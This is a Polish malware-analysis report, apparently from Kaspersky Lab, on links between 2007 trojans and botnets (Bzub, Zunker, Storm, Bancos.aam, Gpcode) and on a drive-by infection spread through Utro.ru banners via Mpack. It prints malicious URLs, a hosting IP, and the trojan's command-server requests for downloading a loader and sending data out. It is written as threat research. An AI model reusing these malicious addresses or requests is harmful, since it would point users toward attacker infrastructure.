Ewolucja złośliwego oprogramowania VII-IX 2007

Przeczytaj także: Ewolucja złośliwego oprogramowania I-VI 2007

Do końca nie było wiadomo, co to znaczy. Zaczęto podejrzewać istnienie międzynarodowej grupy zamieszanej w tworzenie i rozprzestrzenianie ogromnej większości dzisiejszych szkodliwych programów.

Najgorsze obawy potwierdziły się, gdy przeanalizowano botnet, który został stworzony przy użyciu Bzuba. Stało się jasne, że trojan, nazwany przez swojego autora Zupacha, był bezpośrednim krewnym Bzuba. Bzub oraz Zupach to prawie identyczne programy, jednak Bzub posiada funkcję trojana szpiegującego, Zupacha natomiast jej nie posiada.

Bzub/ Zupacha są klientami bota zarządzanymi przez system botnetu Zunker.

Istnieje jeszcze inny szkodliwy program związany z botnetem Zunker: Email-Worm.Win32.Zhelatin.bg. Jest to jeden ze sławnych robaków Storm, które od początku 2007 roku zalewają ruch pocztowy. W celu rozprzestrzeniania się robaki te wykorzystują zaawansowane metody socjotechniki.

Podsumowując: Zhelatin, Warezov, Bancos.aam, Bzub, a teraz Gpcode.ai są ze sobą powiązane. Programy te pochodzą z różnych rodzin, jednak rodziny te należą do jednych z najaktywniejszych i najniebezpieczniejszych szkodliwych programów w tym momencie. Pliki o takich nazwach, jak ntos.exe, video.dll, audio.dll, sporder.dll, lcewza.exe, filech.exe, filede.exe, iphone.scr, ldr.exe, ldr2.exe, loader.exe, pajero.exe, update92520748.exe, zeus.exe, zs1.exe są dobrze znane analitykom wirusów na całym świecie.

Powiązania między trojanami przedstawiają się w następujący sposób: W czasie gdy prowadzono dochodzenie w Kaspersky Lab, nieznani szkodliwi użytkownicy stali się całkowicie znani. Mówiąc ściślej, nie próbowali zwrócić na siebie uwagi, jednak wydarzenia, jakie nastąpiły, okazały się bardzo znaczące.

Broker

25 lipca 2007 r. (zaledwie 10 dni po pojawieniu się Gpcode.ai) analitycy z firmy Kaspersky Lab zauważyli aktywne rozprzestrzenianie się nowego szkodliwego programu. Jego ofiarą padli użytkownicy kilku najpopularniejszych rosyjskich stron informacyjnych - utro.ru, gzt.ru, rbc.ru.

Stało się jasne, że otworzyli oni odsyłacz (http://www.txt.utro.ru/cgi- bin/banner/rian?86028&options=FN) w systemie banerowym Utro.ru, który zawierał odsyłacz do zainfekowanej strony (http://81.95.145.210/333/m00333/index.php). Stronę tę hostowała firma RBN (Russian Business Network).

Po otwarciu tej strony, przeglądarka użytkownika była atakowana przy użyciu kolekcji eksploitów (w tym przypadku, Mpack). Gdyby atak powiódł się, na zaatakowaną maszynę zostałby pobrany trojan downloader. Program ten zainstalowałby z kolei inny szkodliwy program - Trojan-Spy.Win32.Bancos.aam.

Po zainstalowaniu się w systemie trojan zacząłby wykonywać następujące polecenia:

Host: 81.95.149.66
GET /e1/file.php HTTP/1.1
GET /ldr1.exe HTTP/1.1
GET /cfg.bin HTTP/1.0
POST /s.php?1=april_002fdf3f&i= HTTP/1.0